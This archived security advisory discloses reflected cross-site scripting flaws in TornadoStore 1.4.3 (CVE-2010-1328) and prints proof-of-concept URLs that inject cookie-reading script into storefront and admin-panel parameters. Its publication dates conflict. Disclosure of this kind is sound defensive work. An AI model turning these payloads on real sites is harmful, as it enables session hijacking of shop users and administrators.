what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TornadoStore 1.4.3 Cross Site Scripting

TornadoStore 1.4.3 Cross Site Scripting
Posted Jun 30, 2010
Authored by Lucas Apa | Site bonsai-sec.com

TornadoStore versions 1.4.3 and below suffer from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2010-1328
SHA-256 | 92c1121c6831c5a577d60e10a6710d9a1c246a997843d48ddab155167b739e84

TornadoStore 1.4.3 Cross Site Scripting

Change Mirror Download
           Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/

Multiple XSS in TornadoStore 1.4.3

1. *Advisory Information*

Title: Multiple XSS in TornadoStore 1.4.3
Advisory ID: BONSAI-2010-0107
Advisory URL:
http://www.bonsai-sec.com/research/vulnerabilities/tornadostore-multiple-xss-0107.php
Date published: 2010-06-29
Vendors contacted: TornadoStore
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-1328


3. *Software Description*

TornadoStore™ is an ecommerce platform. The objective is to solve integrally
the commercialization of products and services of companies using an online
payment system. [0].


4. *Vulnerability Description*

Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it.

For additional information, please read [1].


5. *Vulnerable packages*

Version <= 1.4.3


6. *Non-vulnerable packages*

TornadoStore developers informed us that all users should upgrade to the latest
version of TornadoStore, which fixes this vulnerability. More information to be
found here:
http://www.tornadostore.com


7. *Credits*

This vulnerability was discovered by Lucas Apa ( lucas -at- bonsai-sec.com ).


8. *Technical Description*

8.1 A Reflected Cross Site Scripting vulnerability was found in the
"tipo" and "destino" variables within the 'Services' section
and "rubro", "arti" on 'Products' section.
This is because the application does not properly sanitise
the users input. The vulnerability can be triggered by clicking on the
following URL:

http://www.example.com/login_registrese.php3?tipo=bonsai"/><script>alert(document.cookie)</script>&destino=ordenes_pago.php3

http://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3"<script>alert(document.cookie)</script>

http://www.example.com/precios.php3?pbegin=0&subrubro=15&rubro=4"</a><script>alert(document.cookie)</script>"&expand=SI&familia=&marca=&campoorden=nArtPre&vertodos=ALL

http://www.example.com/recomenda_articulo.php3?arti=002"><script>alert(document.cookie)</script>

8.2 A Reflected Cross Site Scripting vulnerability was found in the
TornadoStore Administration Panel. In "descrip" and "tit" variables
within the 'e-Commerce' Section. This could lead to admin session hijacking.

http://www.example.com/control/abm_det.php3?db=ts_143&tabla=profile&id=cDefSec%3DMAIN%2CcDefKey%3DMAIL_PEDIDO_TEMPRANO%2CcSis%3Ddemo_143&tabla_det=&tit=Par%E1metros%20del%20sitio&pkmapped=&ira=&pagina=1&det_order=&det_ordor=&txtBuscar=&vars=display_text_chars=45,display_text_lines=1&where=cDefSec=%27MAIN%27&whereMaster=cDefSec=%27MAIN%27&descrip="<script>alert(document.cookie)</script><a href="

http://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=</span></td><script>alert(document.cookie)</script>&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where=

http://www.example.com/control/abm_det.php3?db=ts_143&tabla=usuario&tit=</span></td><script>alert(document.cookie)</script>


9. *Report Timeline*

- 2010-02-02:
Vulnerabilities were identified.

- 2010-02-08:
Vendor confirmed these vulnerabilities.

- 2010-02-16:
Vendor contacted for an approximate fix release date. No specific answer given.

- 2010-03-10:
Vendor fixed these vulnerabilities. No specific answer given.

- 2010-04-12:
Vendor fixed this issue.

- 2010-05-29:
The advisory BONSAI-2010-0107 is published.


10. *References*

[0] http://www.tornadostore.com
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/blog/

11. *About Bonsai*

Bonsai is a company involved in providing professional computer information security services.
Currently a sound growth company, since its foundation in early 2009 in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our customers' real needs.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Bonsai Information Security, and may be
distributed freely provided that no fee is charged for this distribution and proper credit is
given.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close